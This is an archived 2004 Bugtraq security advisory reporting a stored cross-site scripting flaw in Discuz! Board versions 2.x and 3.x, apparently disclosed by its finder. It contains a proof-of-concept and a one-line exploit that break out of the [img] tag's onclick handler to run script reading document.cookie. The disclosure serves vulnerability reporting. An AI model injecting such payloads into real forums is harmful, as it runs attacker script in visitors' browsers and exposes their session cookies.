lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 5 Feb 2004 11:38:14 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: Possible Cross Site Scripting in Discuz! Board




Advisory Name:Possible Cross Site Scripting in Discuz! Board
Release Date: Feb 5,2004
Application: Discuz! Board
Version Affected: 2.x , 3.x
Platform: PHP
Severity: Low
Discover: Cheng Peng Su(apple_soup_at_msn.com)
Vendor URL: http://www.discuz.com/
################################################
Proof Of Concept:
   A thread including:
       [img]http://a.gif');(xss code);a=escape('a[/img]
   will be 
       <img src="http://a.gif');(xss code);a=escape=('a" border="0" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" onmouseover="if(this.resized) this.style.cursor='hand';" onclick="if(this.resized) window.open('http://site/pic.gif');(xss code);a=escape('a');">

   So there will be a red 'x' instead of a normal pic,if visitor click the red 'x',the code will be executed.
   I think you know why i add " ;a=escape('a " after the xss code.

Exploit:
   [img]http://a.gif');alert(document.cookie);a=escape=('a[/img]


Powered by blists - more mailing lists